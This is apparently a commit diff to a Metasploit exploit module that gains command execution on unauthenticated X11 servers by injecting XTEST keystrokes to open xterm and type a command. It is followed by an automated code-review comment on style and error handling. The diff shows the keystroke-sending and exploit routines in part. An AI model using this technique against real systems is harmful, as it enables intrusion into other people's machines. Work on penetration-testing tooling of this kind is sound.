
Commit d6a9fc2

author
xistence
committed
Merge branch 'hmoore-r7-land-5692' into x11_keyboard_exec
2 parents a81a9e0 + 95b9208 commit d6a9fc2


1 file changed

+18
-17
lines changed

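--- a/modules/exploits/unix/x11/x11_keyboard_exec.rb
+++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb
@@ -109,11 +109,11 @@ def initialize(info = {})
 register_options(
 [
 Opt::RPORT(6000),
-OptInt.new('TIME_WAIT', [ true, 'Time to wait for opening GUI windows', 5])
+OptInt.new('TIME_WAIT', [ true, 'Time to wait for opening GUI windows in seconds', 5])
 ], self.class)
 end
 
-def press_key( key )
+def press_key(key)
 req = "\x8e\x02\x09\x00"
 req << "\x02"
 req << key
@@ -129,15 +129,15 @@ def press_key( key )
 
 sock.put(req)
 
-res = sock.recv(1024)
+res = sock.get_once
 # Response should give 1 on first byte (Success)
-unless res and res[0] == "\x01"
-fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error pressing key: #{key}")
+unless res and res[0,1] == "\x01"
+fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error pressing key: #{key} #{res.inspect}")
 end
 
 end
 
-def release_key( key )
+def release_key(key)
 req = "\x8e\x02\x09\x00"
 req << "\x03"
 req << key
@@ -153,18 +153,18 @@ def release_key( key )
 
 sock.put(req)
 
-res = sock.recv(1024)
+res = sock.get_once
 # Response should give 1 on first byte (Success)
-unless res and res[0] == "\x01"
-fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error releasing key: #{key}")
+unless res and res[0,1] == "\x01"
+fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error releasing key: #{key} #{res.inspect}")
 end
 
 end
 
-def type_command( command )
+def type_command(command)
 # Specify the special keys which need to have shift pressed first to type
-specialkeys = '<>{}|"&()'.chars.to_a
-values = command.chars.to_a
+specialkeys = '<>{}|"&()'.chars
+values = command.chars
 values.each do |value|
 key = KB_KEYS[value]
 # Special keys need a shift pressed to be typed
@@ -186,8 +186,8 @@ def type_command( command )
 end
 end
 # Send an enter
-press_key( "\x24" ) # [enter]
-release_key( "\x24" ) # [enter]
+press_key("\x24") # [enter]
+release_key("\x24") # [enter]
 end
 
 
@@ -212,10 +212,10 @@ def exploit
 sock.put(req)
 
 # Retrieve the whole X11 details response
-res = sock.recv(4096)
+res = sock.get_once
 
 # Response should give 0x01 in first byte (Success)
-unless res and res[0] == "\x01"
+unless res and res[0,1] == "\x01"
 fail_with(Failure::Unknown, "#{rhost}:#{rport} - Registering keyboard failed")
 end
 
@@ -227,12 +227,14 @@ def exploit
 release_key(KB_KEYS["f2"])
 
 # Wait X seconds to open the dialog
+print_status("Waiting #{datastore['TIME_WAIT']} seconds...")
 select(nil, nil, nil, datastore['TIME_WAIT'])
 
 # Start a xterm terminal
 print_status("#{rhost}:#{rport} - Opening xterm")
 type_command("xterm")
 
+print_status("Waiting #{datastore['TIME_WAIT']} seconds...")
 # Wait X seconds to open the terminal
 select(nil, nil, nil, datastore['TIME_WAIT'])
 
@@ -242,7 +244,6 @@ def exploit
 
 type_command(command)
 
-
 handler
 rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
 print_error("#{rhost}:#{rport} - #{e.message}")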
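Review bot: The rewritten reply check `unless res and res[0,1] == "\x01"` (new side of the press_key hunk, repeated in the release_key hunk and in the keyboard-registration hunk of exploit) uses the low-precedence `and` for boolean logic; it only parses as intended because `and` binds looser than `==`, and the conventional form is `unless res && res[0, 1] == "\x01"`. The read-and-check sequence `res = sock.get_once` / first-byte test / `fail_with` is now copied verbatim into press_key and release_key, differing only in the word pressing/releasing, so a small private helper that takes the message and performs the `get_once` plus first-byte check would keep that logic in one place. Since `key` is a raw keycode byte, interpolating it directly into the `fail_with` message puts an unprintable character in the log; `#{key.inspect}` would match the `res.inspect` treatment added on the same line. press_key, release_key and exploit each extend beyond the hunks shown.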
